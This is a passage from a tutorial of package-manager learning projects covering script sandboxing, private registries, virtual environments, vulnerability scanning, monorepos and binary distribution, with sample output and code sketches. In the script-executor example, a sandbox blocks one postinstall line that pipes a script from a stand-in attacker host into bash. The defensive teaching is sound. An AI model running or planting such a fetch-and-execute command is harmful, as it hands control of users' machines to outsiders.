  • Timeout and resource limits (prevent runaway scripts) → maps to resource management

Key Concepts:

  • Process Creation: “The Linux Programming Interface” Chapter 24-26 - Michael Kerrisk
  • Environment Variables: “The Linux Programming Interface” Chapter 6 - Michael Kerrisk
  • Sandboxing: “Linux Basics for Hackers” Chapter 14 - OccupyTheWeb
  • Supply Chain Security: Socket.dev blog on npm security - Current research

Difficulty: Advanced. Time estimate: 1-2 weeks. Prerequisites: Process management, shell scripting, security basics.

Real world outcome:

$ cat package.json
{
  "name": "native-addon",
  "scripts": {
    "preinstall": "echo 'Checking system requirements...'",
    "install": "node-gyp rebuild",
    "postinstall": "node ./setup.js"
  }
}

$ ./script-runner execute ./package.json --phase=install

[preinstall] Running: echo 'Checking system requirements...'
[preinstall] Checking system requirements...
[preinstall] ✓ Completed in 0.01s

[install] Running: node-gyp rebuild
[install] Setting up environment...
[install]   CC=/usr/bin/clang
[install]   CXX=/usr/bin/clang++
[install]   npm_config_node_gyp=/usr/local/lib/node_modules/node-gyp
[install] Compiling native addon...
[install] gyp info spawn clang++
[install] gyp info spawn args ['-fPIC', '-shared', '-o', 'build/Release/addon.node', ...]
[install] ✓ Completed in 4.2s

[postinstall] Running: node ./setup.js
[postinstall] Creating configuration file...
[postinstall] ✓ Completed in 0.3s

All scripts completed successfully.

$ ./script-runner execute ./malicious-package --sandbox

[postinstall] Running: curl evil.com/steal.sh | bash
[postinstall] ⚠️  BLOCKED: Network access denied (sandbox policy)
[postinstall] ✗ Script terminated

Security report:
  Attempted network connections: 1 (blocked)
  Attempted filesystem writes outside package: 0

Recommendation: Review this package before installing with --ignore-scripts

Implementation Hints:

  • Use os/exec (Go), subprocess (Python), or std::process::Command (Rust) for spawning
  • Set up environment variables like npm_package_name, npm_lifecycle_event, PATH (including node_modules/.bin)
  • For sandboxing on Linux, consider using seccomp, namespaces, or running in a container
  • On macOS, use sandbox-exec with a profile that restricts network and filesystem
  • Implement timeouts with context.WithTimeout (Go) or similar
  • Capture both stdout and stderr, stream them with prefixes for visibility
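
A hedged sketch of a single phase, in Python rather than the project's Go; the env variable names follow npm's convention, and the timeout value is arbitrary:

```python
import os, subprocess

def run_phase(pkg_name: str, phase: str, command: str, timeout=60):
    """Run one lifecycle script with npm-style env vars and a timeout."""
    env = dict(os.environ,
               npm_package_name=pkg_name,
               npm_lifecycle_event=phase)
    try:
        result = subprocess.run(command, shell=True, env=env,
                                capture_output=True, text=True,
                                timeout=timeout)
    except subprocess.TimeoutExpired:
        print(f"[{phase}] ✗ timed out after {timeout}s")
        return False
    for line in result.stdout.splitlines():
        print(f"[{phase}] {line}")            # prefix output for visibility
    return result.returncode == 0

ok = run_phase("native-addon", "preinstall",
               "echo Checking system requirements...")
```

Sandboxing then wraps the same spawn in seccomp/namespaces (Linux) or sandbox-exec (macOS) instead of calling the shell directly.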

Learning milestones:

  1. Execute lifecycle scripts in order → You understand npm’s script phases
  2. Set up proper build environment → You understand native compilation
  3. Implement basic sandboxing → You understand security concerns
  4. Handle failures and timeouts gracefully → You understand robustness

Project 9: Private Registry Server

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Go
  • Alternative Programming Languages: Rust, Python, TypeScript
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 4. The “Open Core” Infrastructure
  • Difficulty: Level 3: Advanced
  • Knowledge Area: HTTP Servers / APIs
  • Software or Tool: Private npm/Cargo Registry
  • Main Book: “Designing Data-Intensive Applications” by Martin Kleppmann

What you’ll build: A private package registry server compatible with npm or Cargo that can host internal packages, proxy to public registries (with caching), and handle publishing with authentication.

Why it teaches package managers: You’ll understand the server side—how registries store metadata, serve tarballs, handle authentication, and why companies run private registries for proprietary code. This is the complement to Project 4 (registry client).

Core challenges you’ll face:

  • Implementing the registry API (GET /:package, PUT /:package) → maps to API design
  • Storing package metadata (database or filesystem) → maps to data persistence
  • Proxying to upstream registries (npmjs.org) with caching → maps to caching proxies
  • Authentication and authorization (tokens, scopes) → maps to security
  • Handling package publishing (upload, validate, store) → maps to write APIs

Key Concepts:

  • HTTP Server Design: “Design and Build Great Web APIs” Chapter 5 - Mike Amundsen
  • Caching Proxies: “Designing Data-Intensive Applications” Chapter 5 - Martin Kleppmann
  • Authentication Patterns: “Foundations of Information Security” Chapter 7 - Jason Andress
  • Content-Addressable Storage: “Designing Data-Intensive Applications” Chapter 3 - Kleppmann

Difficulty: Advanced. Time estimate: 2-3 weeks. Prerequisites: HTTP server development, database basics, authentication.

Real world outcome:

# Start your private registry
$ ./registry-server --port 4873 --storage ./packages --upstream https://registry.npmjs.org

Private Registry Server
  Listening: http://localhost:4873
  Storage: ./packages (142 cached packages)
  Upstream: https://registry.npmjs.org (proxy enabled)

# Configure npm to use your registry
$ npm config set registry http://localhost:4873

# Install a public package (proxied and cached)
$ npm install lodash

[registry] GET /lodash
[registry] Cache miss - proxying to upstream
[registry] Caching lodash@4.17.21 (308KB)
[registry] 200 OK (1.2s)

# Install same package again (served from cache)
$ npm install lodash

[registry] GET /lodash
[registry] Cache hit ✓
[registry] 200 OK (12ms)

# Publish a private package
$ npm publish ./my-internal-lib

[registry] PUT /my-internal-lib
[registry] Authenticated: token=npm_xxx...
[registry] Validating package...
[registry] Storing my-internal-lib@1.0.0 (24KB)
[registry] 201 Created

# Search private packages
$ curl http://localhost:4873/-/v1/search?text=my-internal
{
  "objects": [{
    "package": {
      "name": "my-internal-lib",
      "version": "1.0.0",
      "private": true
    }
  }]
}

Implementation Hints:

  • For npm compatibility, implement these endpoints: GET /:package, GET /:package/:version, PUT /:package, GET /-/v1/search
  • Store metadata as JSON files: storage/package-name/package.json
  • Store tarballs: storage/package-name/package-name-version.tgz
  • For proxying, first check local storage, then fetch from upstream and cache
  • Use bearer token authentication matching npm’s format
  • Consider using SQLite for metadata and filesystem for tarballs for simplicity
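
The cache-or-proxy read path from the hints can be sketched in Python for brevity (a minimal sketch: `get_packument` and `fetch_upstream` are hypothetical names, and a real server would add HTTP handling, concurrency control, and cache expiry):

```python
import json
from pathlib import Path

def get_packument(name: str, storage: Path, fetch_upstream) -> tuple[dict, str]:
    """Return (metadata, "hit" | "miss"), caching upstream results locally."""
    meta_file = storage / name / "package.json"
    if meta_file.exists():
        # Served from local storage; no upstream round trip needed.
        return json.loads(meta_file.read_text()), "hit"
    # Cache miss: proxy to the upstream registry, then persist the result
    # so the next request for this package is served locally.
    meta = fetch_upstream(name)
    meta_file.parent.mkdir(parents=True, exist_ok=True)
    meta_file.write_text(json.dumps(meta))
    return meta, "miss"
```

The same check-local-then-proxy shape applies to tarball requests; only the storage path and content type change.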

Learning milestones:

  1. Serve package metadata and tarballs → You understand the read API
  2. Proxy and cache from upstream → You understand caching registries
  3. Handle publishing with auth → You understand the write API
  4. Support search and listing → You understand registry discovery

Project 10: Virtual Environment Manager

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Rust
  • Alternative Programming Languages: Go, Python, C
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 2. The “Micro-SaaS / Pro Tool” (Solo-Preneur Potential)
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Environment Isolation / Shells
  • Software or Tool: venv/virtualenv Clone
  • Main Book: “The Linux Programming Interface” by Michael Kerrisk

What you’ll build: A tool that creates isolated environments with their own bin/, lib/, and package directories, activates/deactivates them by modifying PATH, and ensures packages installed in one env don’t affect another.

Why it teaches package managers: Python’s virtualenv, Ruby’s rbenv, Node’s nvm—all solve the “multiple projects, different versions” problem. You’ll understand how environment isolation actually works (it’s mostly PATH manipulation and symlinks).

Core challenges you’ll face:

  • Creating isolated directory structures → maps to filesystem organization
  • Generating activation scripts (bash, zsh, fish) → maps to shell integration
  • PATH manipulation (prepend env’s bin/) → maps to environment variables
  • Isolating package installations (pip install goes to env) → maps to tool configuration
  • Detecting current environment (which env am I in?) → maps to state tracking

Key Concepts:

  • Environment Variables: “The Linux Programming Interface” Chapter 6 - Michael Kerrisk
  • Shell Scripting: “Effective Shell” Chapters 15-20 - Dave Kerr
  • Python’s venv: venv documentation - Reference implementation
  • PATH Mechanics: “How Linux Works, 3rd Edition” Chapter 2 - Brian Ward

Difficulty: Advanced Time estimate: 1-2 weeks Prerequisites: Shell scripting, environment variables, PATH understanding

Real world outcome:

$ ./venv-manager create myproject --python 3.11

Creating virtual environment 'myproject'...
  Base Python: /usr/bin/python3.11
  Environment: ~/.venvs/myproject/

Creating directory structure:
  ✓ ~/.venvs/myproject/bin/
  ✓ ~/.venvs/myproject/lib/python3.11/site-packages/
  ✓ ~/.venvs/myproject/include/

Creating symlinks:
  ✓ bin/python → /usr/bin/python3.11
  ✓ bin/python3 → python

Generating activation scripts:
  ✓ bin/activate (bash/zsh)
  ✓ bin/activate.fish
  ✓ bin/activate.ps1

✓ Environment created. Activate with:
  source ~/.venvs/myproject/bin/activate

$ source ~/.venvs/myproject/bin/activate

(myproject) $ which python
~/.venvs/myproject/bin/python

(myproject) $ pip install requests
# Installs to ~/.venvs/myproject/lib/python3.11/site-packages/

(myproject) $ pip list
Package    Version
---------- -------
requests   2.31.0
urllib3    2.1.0
pip        23.3.1

(myproject) $ deactivate

$ which python
/usr/bin/python3

$ pip list
# Shows system packages, not myproject's

Implementation Hints:

  • The key insight: virtual environments work by prepending their bin/ to PATH
  • Generate an activate script that: saves old PATH, prepends new PATH, sets PS1 prompt, defines deactivate function
  • Create symlinks from env/bin/python to the actual interpreter
  • For Python, also set the VIRTUAL_ENV environment variable (many tools check it to detect the active env; pip itself installs relative to the interpreter it runs under)
  • The pyvenv.cfg file tells Python to use the environment’s site-packages
  • Consider supporting multiple shells (bash, zsh, fish have different syntax)
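
The activation mechanics from the hints fit in a few lines of generated shell, sketched here in Python (a sketch: fish and PowerShell need their own syntax, and PS1 prompt handling is omitted):

```python
# Generate a bash/zsh activate script. The script: saves the old PATH,
# prepends the env's bin/, exports VIRTUAL_ENV, and defines a
# deactivate() function that undoes all of it.
def make_activate_script(env_dir: str) -> str:
    return f'''# Source this file: `source {env_dir}/bin/activate`
deactivate () {{
    PATH="$_OLD_PATH"
    export PATH
    unset _OLD_PATH VIRTUAL_ENV
    unset -f deactivate
}}
_OLD_PATH="$PATH"
VIRTUAL_ENV="{env_dir}"
PATH="$VIRTUAL_ENV/bin:$PATH"
export PATH VIRTUAL_ENV
'''
```

Because the script must modify the caller's environment, it has to be sourced rather than executed; that is why every virtualenv-style tool tells you to `source bin/activate`.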

Learning milestones:

  1. Create isolated directory structure → You understand env layout
  2. Generate working activation scripts → You understand shell integration
  3. Packages install to correct location → You understand isolation
  4. Multiple envs coexist without conflict → You understand the full system

Project 11: Package Vulnerability Scanner

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Go
  • Alternative Programming Languages: Rust, Python, TypeScript
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 3. The “Service & Support” Model
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Security / APIs
  • Software or Tool: npm audit / cargo audit Clone
  • Main Book: “Foundations of Information Security” by Jason Andress

What you’ll build: A scanner that reads your lock file, queries vulnerability databases (like OSV, GitHub Advisory Database, or npm’s audit API), and reports known CVEs with severity ratings and remediation advice.

Why it teaches package managers: Modern package managers include npm audit and cargo audit because supply chain security matters. You’ll understand how vulnerability databases work, why SBOMs (Software Bills of Materials) exist, and how to assess risk.

Core challenges you’ll face:

  • Parsing lock files (extract package names and exact versions) → maps to file parsing
  • Querying vulnerability APIs (OSV, GitHub, npm) → maps to API integration
  • Matching versions to advisories (is 4.17.15 affected by CVE-2021-xxxx?) → maps to version ranges
  • Severity scoring (CVSS, understanding impact) → maps to risk assessment
  • Generating actionable reports (what to upgrade to) → maps to user experience

Resources for key challenges:

Key Concepts:

  • CVE and CVSS: “Foundations of Information Security” Chapter 15 - Jason Andress
  • Software Bill of Materials: SBOM Overview - CISA guidance
  • API Integration: “Design and Build Great Web APIs” Chapter 4 - Mike Amundsen
  • Supply Chain Security: “Practical Malware Analysis” Chapter 1 (concepts) - Sikorski & Honig

Difficulty: Intermediate Time estimate: 1 week Prerequisites: HTTP APIs, JSON parsing, lock file understanding

Real world outcome:

$ ./vuln-scanner scan package-lock.json

Scanning 247 packages from package-lock.json...
Querying OSV database...

Found 3 vulnerabilities:

┌────────────────────────────────────────────────────────────────────┐
│ CRITICAL: lodash < 4.17.21                                         │
│ CVE-2021-23337 - Command Injection                                 │
├────────────────────────────────────────────────────────────────────┤
│ Your version: 4.17.15                                              │
│ Fixed in: 4.17.21                                                  │
│ CVSS: 9.8 (Critical)                                               │
│ Introduced by: express → body-parser → lodash                      │
│                                                                    │
│ Remediation: npm update lodash                                     │
└────────────────────────────────────────────────────────────────────┘

┌────────────────────────────────────────────────────────────────────┐
│ HIGH: minimist < 1.2.6                                             │
│ CVE-2021-44906 - Prototype Pollution                               │
├────────────────────────────────────────────────────────────────────┤
│ Your version: 1.2.0                                                │
│ Fixed in: 1.2.6                                                    │
│ CVSS: 7.5 (High)                                                   │
│ Introduced by: mocha → mkdirp → minimist                           │
│                                                                    │
│ Remediation: npm update minimist                                   │
└────────────────────────────────────────────────────────────────────┘

┌────────────────────────────────────────────────────────────────────┐
│ MODERATE: glob-parent < 5.1.2                                      │
│ CVE-2020-28469 - Regular Expression DoS                            │
├────────────────────────────────────────────────────────────────────┤
│ Your version: 5.0.0                                                │
│ Fixed in: 5.1.2                                                    │
│ CVSS: 5.3 (Moderate)                                               │
│                                                                    │
│ Remediation: npm update glob-parent                                │
└────────────────────────────────────────────────────────────────────┘

Summary:
  Total packages: 247
  Vulnerabilities: 3 (1 critical, 1 high, 1 moderate)

Run with --fix to automatically update vulnerable packages.

Implementation Hints:

  • OSV API: POST https://api.osv.dev/v1/querybatch with list of packages
  • Parse lock files to extract {"package": {"name": "...", "ecosystem": "npm"}, "version": "..."}
  • Match advisory affected ranges against installed versions (use your semver library from Project 1!)
  • CVSS scores: 0.0-3.9 (Low), 4.0-6.9 (Medium), 7.0-8.9 (High), 9.0-10.0 (Critical)
  • For remediation, find the minimum fixed version that satisfies the original constraint
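
The version-matching and scoring steps can be sketched in Python (a toy sketch: versions are assumed to be plain MAJOR.MINOR.PATCH, a real scanner should reuse the semver library from Project 1, and each advisory is assumed to have a single fixed version rather than full affected ranges):

```python
def severity(cvss: float) -> str:
    """Bucket a CVSS score using the ranges from the hints above."""
    if cvss >= 9.0:
        return "Critical"
    if cvss >= 7.0:
        return "High"
    if cvss >= 4.0:
        return "Medium"
    return "Low"

def _parse(v: str) -> tuple:
    # "4.17.15" -> (4, 17, 15), so tuples compare component-wise
    return tuple(int(p) for p in v.split("."))

def is_affected(installed: str, fixed_in: str) -> bool:
    """A package is vulnerable if it is below the first fixed version."""
    return _parse(installed) < _parse(fixed_in)
```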

Learning milestones:

  1. Parse lock files and query APIs → You understand the data flow
  2. Match versions to advisories → You understand vulnerability ranges
  3. Generate actionable reports → You understand security UX
  4. Trace vulnerability paths → You understand transitive dependencies

Project 12: Monorepo Workspace Manager

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: TypeScript
  • Alternative Programming Languages: Rust, Go, Python
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 4. The “Open Core” Infrastructure
  • Difficulty: Level 4: Expert
  • Knowledge Area: Build Systems / Graph Algorithms
  • Software or Tool: npm workspaces / Turborepo Clone
  • Main Book: “Software Architecture in Practice” by Bass, Clements & Kazman

What you’ll build: A monorepo manager that handles multiple packages in one repository, manages inter-package dependencies, builds in correct order with caching, and only rebuilds what changed.

Why it teaches package managers: Modern development uses monorepos (Google, Facebook, Microsoft). Tools like Lerna, Nx, and Turborepo add layers on top of package managers. You’ll understand workspace protocols, local dependencies, and incremental builds.

Core challenges you’ll face:

  • Workspace discovery (find all packages in repo) → maps to filesystem traversal
  • Local dependency linking (pkg-a depends on pkg-b in same repo) → maps to symlinks
  • Topological build order (build deps before dependents) → maps to graph algorithms
  • Incremental builds (only rebuild what changed) → maps to change detection
  • Task caching (don’t rebuild if inputs unchanged) → maps to content-addressable caching

Key Concepts:

  • Topological Sort: “Algorithms, Fourth Edition” Chapter 4.2 - Sedgewick & Wayne
  • Build Systems: “The GNU Make Book” Chapter 1 - John Graham-Cumming
  • Content Hashing: “Designing Data-Intensive Applications” Chapter 3 - Kleppmann
  • Monorepo Patterns: Turborepo docs - Architecture explanation

Difficulty: Expert Time estimate: 3-4 weeks Prerequisites: All previous projects, build system understanding

Real world outcome:

$ tree packages/
packages/
├── core/
│   ├── package.json  # "name": "@myorg/core"
│   └── src/
├── utils/
│   ├── package.json  # "name": "@myorg/utils", deps: ["@myorg/core"]
│   └── src/
├── api/
│   ├── package.json  # "name": "@myorg/api", deps: ["@myorg/core", "@myorg/utils"]
│   └── src/
└── web/
    ├── package.json  # "name": "@myorg/web", deps: ["@myorg/api"]
    └── src/

$ ./workspace-manager analyze

Workspace: 4 packages
  @myorg/core (0 internal deps)
  @myorg/utils (1 internal dep: core)
  @myorg/api (2 internal deps: core, utils)
  @myorg/web (1 internal dep: api)

Build order (topological):
  1. @myorg/core
  2. @myorg/utils
  3. @myorg/api
  4. @myorg/web

$ ./workspace-manager build

Building workspace...

@myorg/core
  Hash: a1b2c3d4
  Cache: MISS
  Building... ✓ (2.1s)

@myorg/utils
  Hash: e5f6g7h8
  Cache: MISS
  Building... ✓ (1.3s)

@myorg/api
  Hash: i9j0k1l2
  Cache: MISS
  Building... ✓ (3.7s)

@myorg/web
  Hash: m3n4o5p6
  Cache: MISS
  Building... ✓ (8.2s)

Total: 15.3s (0 cached)

# Make a change only to @myorg/utils

$ ./workspace-manager build

Building workspace (incremental)...

@myorg/core
  Hash: a1b2c3d4
  Cache: HIT ✓ (restored in 0.1s)

@myorg/utils
  Hash: q7r8s9t0 (changed)
  Cache: MISS
  Building... ✓ (1.3s)

@myorg/api
  Hash: u1v2w3x4 (deps changed)
  Cache: MISS
  Building... ✓ (3.7s)

@myorg/web
  Hash: y5z6a7b8 (deps changed)
  Cache: MISS
  Building... ✓ (8.2s)

Total: 13.4s (1 cached, saved 2.1s)

Implementation Hints:

  • Discover workspaces by finding all package.json files with workspace globs (e.g., "workspaces": ["packages/*"])
  • Local dependencies are detected when a dep name matches another workspace package
  • For linking, create symlinks in node_modules pointing to the local package
  • Compute content hashes by hashing all input files (source, package.json) and dependency hashes
  • Store cache in .workspace-cache/ with hash as filename
  • When a package’s hash changes, all dependents must also be considered changed
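
Both graph steps from the hints can be sketched with Python's standard-library graphlib (the four-package graph mirrors the core/utils/api/web workspace above; in the real tool, "changed" would be derived from content hashes rather than passed in):

```python
from graphlib import TopologicalSorter

# package -> its internal dependencies (must be built first)
deps = {
    "core": [],
    "utils": ["core"],
    "api": ["core", "utils"],
    "web": ["api"],
}

def build_order(deps: dict) -> list:
    """Topological order: every package appears after its dependencies."""
    return list(TopologicalSorter(deps).static_order())

def affected(changed: set, deps: dict) -> set:
    """Everything that must rebuild when `changed` packages change."""
    dirty = set(changed)
    # Walking in build order guarantees a package's deps are classified
    # before the package itself, so dirtiness propagates in one pass.
    for pkg in build_order(deps):
        if any(d in dirty for d in deps[pkg]):
            dirty.add(pkg)
    return dirty
```

With this shape, a change to utils marks api and web dirty as well, while core stays cached, matching the incremental-build transcript above.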

Learning milestones:

  1. Discover and link workspaces → You understand monorepo structure
  2. Build in topological order → You understand dependency ordering
  3. Implement content-based caching → You understand incremental builds
  4. Only rebuild affected packages → You understand the full system

Project 13: Binary Distribution (Platform-Specific Packages)

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Rust
  • Alternative Programming Languages: Go, C, C++
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 3. The “Service & Support” Model
  • Difficulty: Level 4: Expert
  • Knowledge Area: Cross-Compilation / Platform Detection
  • Software or Tool: Binary Package Distributor
  • Main Book: “Advanced C and C++ Compiling” by Milan Stevanovic

What you’ll build: A system that builds your CLI tool for multiple platforms (linux-x64, darwin-arm64, windows-x64), packages them with platform-specific metadata, and serves the correct binary based on the user’s system.

Why it teaches package managers: When you npm install esbuild or cargo install ripgrep, how does it know to download the macOS ARM binary on your M1 Mac? This project reveals platform detection, optional dependencies, and binary distribution.

Core challenges you’ll face:

  • Cross-compilation (build for different OS/arch from one machine) → maps to compiler toolchains
  • Platform detection (os.platform(), os.arch()) → maps to system identification
  • Optional/platform-specific dependencies (optionalDependencies in npm) → maps to conditional deps
  • Binary packaging (tarballs, zips, npm packages) → maps to distribution formats
  • Installation selection (pick correct binary at install time) → maps to runtime selection

Key Concepts:

  • Cross-Compilation: “Advanced C and C++ Compiling” Chapter 9 - Milan Stevanovic
  • Platform Detection: “The Linux Programming Interface” Chapter 12 - Michael Kerrisk
  • npm optionalDependencies: npm docs - How esbuild does it
  • ABI Compatibility: “Low-Level Programming” Chapter 14 - Igor Zhirkov

Difficulty: Expert Time estimate: 2-3 weeks Prerequisites: Cross-compilation basics, platform differences

Real world outcome:

$ ./platform-builder build ./my-cli

Cross-compiling my-cli for 6 platforms...

  linux-x64:
    Toolchain: x86_64-unknown-linux-gnu
    Building... ✓
    Binary: 4.2 MB

  linux-arm64:
    Toolchain: aarch64-unknown-linux-gnu
    Building... ✓
    Binary: 3.8 MB

  darwin-x64:
    Toolchain: x86_64-apple-darwin
    Building... ✓
    Binary: 3.9 MB

  darwin-arm64:
    Toolchain: aarch64-apple-darwin
    Building... ✓
    Binary: 3.6 MB

  win32-x64:
    Toolchain: x86_64-pc-windows-msvc
    Building... ✓
    Binary: 4.8 MB (my-cli.exe)

  win32-arm64:
    Toolchain: aarch64-pc-windows-msvc
    Building... ✓
    Binary: 4.1 MB

Creating npm packages...
  @my-cli/linux-x64@1.0.0 → dist/my-cli-linux-x64-1.0.0.tgz
  @my-cli/linux-arm64@1.0.0 → dist/my-cli-linux-arm64-1.0.0.tgz
  @my-cli/darwin-x64@1.0.0 → dist/my-cli-darwin-x64-1.0.0.tgz
  @my-cli/darwin-arm64@1.0.0 → dist/my-cli-darwin-arm64-1.0.0.tgz
  @my-cli/win32-x64@1.0.0 → dist/my-cli-win32-x64-1.0.0.tgz
  @my-cli/win32-arm64@1.0.0 → dist/my-cli-win32-arm64-1.0.0.tgz

Creating wrapper package...
  my-cli@1.0.0 → dist/my-cli-1.0.0.tgz
  optionalDependencies: {
    "@my-cli/linux-x64": "1.0.0",
    "@my-cli/darwin-arm64": "1.0.0",
    ...
  }

# On user's machine (macOS ARM):
$ npm install my-cli

Installing my-cli...
  Resolving platform: darwin-arm64
  Selected: @my-cli/darwin-arm64
  Downloading... ✓

$ npx my-cli --version
my-cli 1.0.0 (darwin-arm64)

Implementation Hints:

  • Use Rust’s cross-compilation with the cross tool, or Go’s GOOS/GOARCH environment variables (e.g., GOOS=linux GOARCH=amd64)
  • npm’s optionalDependencies are tried but don’t fail if unavailable—use this for platform packages
  • The wrapper package has a postinstall script that copies the correct binary from the platform package
  • Use os.platform() and os.arch() in Node.js to detect the current platform
  • Consider supporting fallback to building from source if no binary is available
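
Install-time selection can be sketched in Python (a sketch: the @my-cli scope is the hypothetical one from the example output, and the OS/arch tables cover only the six targets built above):

```python
import platform

# Normalize the names reported by the OS to the target triple parts
# used in the package names above.
OS_MAP = {"Linux": "linux", "Darwin": "darwin", "Windows": "win32"}
ARCH_MAP = {"x86_64": "x64", "AMD64": "x64", "arm64": "arm64", "aarch64": "arm64"}

def platform_package(system: str, machine: str) -> str:
    """Map an OS/arch pair to the matching platform package name."""
    try:
        return f"@my-cli/{OS_MAP[system]}-{ARCH_MAP[machine]}"
    except KeyError:
        # Unknown platform: a real installer would fall back to
        # building from source here.
        raise RuntimeError(f"no prebuilt binary for {system}/{machine}") from None

# On the running machine the inputs would come from:
#   platform_package(platform.system(), platform.machine())
```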

Learning milestones:

  1. Cross-compile for multiple platforms → You understand toolchains
  2. Create platform-specific npm packages → You understand distribution
  3. Automatically select correct binary → You understand platform detection
  4. Handle missing platforms gracefully → You understand fallbacks

Project 14: Full Package Manager (Capstone)

  • File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
  • Main Programming Language: Rust
  • Alternative Programming Languages: Go, C
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 5. The “Industry Disruptor” (VC-Backable Platform)
  • Difficulty: Level 5: Master
  • Knowledge Area: Systems Programming / Full Stack
  • Software or Tool: Complete Package Manager
  • Main Book: “Designing Data-Intensive Applications” by Martin Kleppmann

What you’ll build: A complete, working package manager with its own manifest format, lock files, registry, dependency resolution, installation, and CLI—capable of managing real projects.

Why it teaches package managers: This is the capstone. You’ll integrate everything: semver parsing, dependency resolution, registry protocol, lock files, installation, caching, and security. You’ll understand why npm, Cargo, and pip made the design decisions they did.

Core challenges you’ll face:

  • Designing a manifest format (your own package.json/Cargo.toml) → maps to language design
  • Implementing full resolution (SAT-based or backtracking) → maps to algorithms
  • Building a registry server (with publish/download APIs) → maps to distributed systems
  • Efficient caching (content-addressable, shared across projects) → maps to storage
  • Good CLI UX (progress bars, error messages, colors) → maps to user experience
  • Security (checksums, sandboxed scripts, vulnerability checks) → maps to security engineering

Key Concepts:

  • All previous project concepts, integrated
  • CLI Design: “The Pragmatic Programmer” Chapter 7 - Thomas & Hunt
  • API Design: “Design and Build Great Web APIs” - Mike Amundsen
  • Systems Architecture: “Designing Data-Intensive Applications” - Martin Kleppmann

Difficulty: Master Time estimate: 2-3 months Prerequisites: All previous projects (1-13)

Real world outcome:

$ mypkg init my-project

Creating new project: my-project
  ✓ Created mypkg.toml
  ✓ Created mypkg.lock
  ✓ Created src/main.rs

$ cat mypkg.toml
[package]
name = "my-project"
version = "0.1.0"

[dependencies]
json = "^1.0"
http-client = "^2.0"

$ mypkg install

Resolving dependencies...
  json: 12 versions available
  http-client: 8 versions available

Running SAT solver...
  ✓ Solution found in 23ms

Fetching packages...
  ▸ json@1.2.3        [████████████████████] 100%
  ▸ http-client@2.1.0 [████████████████████] 100%
  ▸ url-parser@1.0.0  [████████████████████] 100% (transitive)

Installing to ./mypkg_modules/...
  ✓ json@1.2.3
  ✓ url-parser@1.0.0
  ✓ http-client@2.1.0

Generating lock file...
  ✓ mypkg.lock updated

Installed 3 packages in 1.2s

$ mypkg audit

Scanning for vulnerabilities...
  ✓ No known vulnerabilities found

$ mypkg publish

Publishing my-project@0.1.0...
  Packing... ✓ (12 files, 24KB)
  Computing integrity... sha512-abc123...
  Uploading to registry.mypkg.dev...
  ✓ Published my-project@0.1.0

View at: https://registry.mypkg.dev/packages/my-project

Implementation Hints:

  • Start by defining your manifest format (TOML is recommended for readability)
  • Implement the core loop: parse manifest → resolve deps → fetch packages → install → generate lock
  • Build the registry server alongside the client (you’ll need both)
  • Focus on good error messages—package manager errors are notoriously cryptic
  • Implement a global cache (~/.mypkg/cache/) shared across all projects
  • Add --verbose and --debug flags for troubleshooting
  • Consider writing a specification document for your package format
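
The core resolve-then-lock loop can be sketched at toy scale in Python (a sketch: it handles only caret constraints on direct dependencies, ignores the ^0.x special case, and leaves transitive resolution and conflicts to the techniques from Projects 2 and 3):

```python
def parse(v: str) -> tuple:
    return tuple(int(p) for p in v.split("."))

def satisfies_caret(version: str, constraint: str) -> bool:
    """Does `version` satisfy a caret constraint like "^1.2"?
    Simplified: real caret semantics pin the first non-zero
    component for 0.x versions."""
    want = parse(constraint.lstrip("^"))
    want = want + (0,) * (3 - len(want))        # pad ^1.2 to 1.2.0
    have = parse(version)
    return have[0] == want[0] and have >= want  # same major, >= floor

def resolve(manifest_deps: dict, registry: dict) -> dict:
    """Pick the highest version of each dep that satisfies its constraint."""
    lock = {}
    for name, constraint in manifest_deps.items():
        matches = [v for v in registry[name] if satisfies_caret(v, constraint)]
        if not matches:
            raise RuntimeError(f"no version of {name} satisfies {constraint}")
        lock[name] = max(matches, key=parse)
    return lock
```

The lock dict is what gets serialized (with integrity hashes) into mypkg.lock, so a later install can skip resolution entirely and fetch exact versions.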

Learning milestones:

  1. Basic install flow works → Core system functions
  2. Lock file enables reproducibility → Deterministic builds
  3. Registry handles publish/download → Distributed system works
  4. Resolution handles complex graphs → Algorithm is correct
  5. Real projects can use it → It’s a real package manager!

Project Comparison Table

| Project | Difficulty | Time | Depth of Understanding | Fun Factor |
|---|---|---|---|---|
| 1. Semver Parser | Intermediate | Weekend | ★★☆☆☆ | ★★☆☆☆ |
| 2. Dependency Graph | Intermediate | Weekend | ★★★☆☆ | ★★★☆☆ |
| 3. SAT Solver | Expert | 2-4 weeks | ★★★★★ | ★★★★☆ |
| 4. Registry Client | Intermediate | 1 week | ★★★☆☆ | ★★★☆☆ |
| 5. Lock File Generator | Advanced | 1-2 weeks | ★★★★☆ | ★★★☆☆ |
| 6. Cellar Installer | Advanced | 1-2 weeks | ★★★★☆ | ★★★★☆ |
| 7. node_modules Hoisting | Advanced | 1-2 weeks | ★★★★☆ | ★★★☆☆ |
| 8. Build Script Executor | Advanced | 1-2 weeks | ★★★☆☆ | ★★★☆☆ |
| 9. Private Registry | Advanced | 2-3 weeks | ★★★★☆ | ★★★★☆ |
| 10. Virtual Env Manager | Advanced | 1-2 weeks | ★★★☆☆ | ★★★☆☆ |
| 11. Vulnerability Scanner | Intermediate | 1 week | ★★★☆☆ | ★★★★☆ |
| 12. Monorepo Manager | Expert | 3-4 weeks | ★★★★★ | ★★★★☆ |
| 13. Binary Distribution | Expert | 2-3 weeks | ★★★★☆ | ★★★★☆ |
| 14. Full Package Manager | Master | 2-3 months | ★★★★★ | ★★★★★ |

Recommended Learning Path

The phases below build a solid foundation before tackling complex integration:

Phase 1: Foundations (2-3 weeks)

  1. Project 1: Semver Parser - You’ll use this everywhere
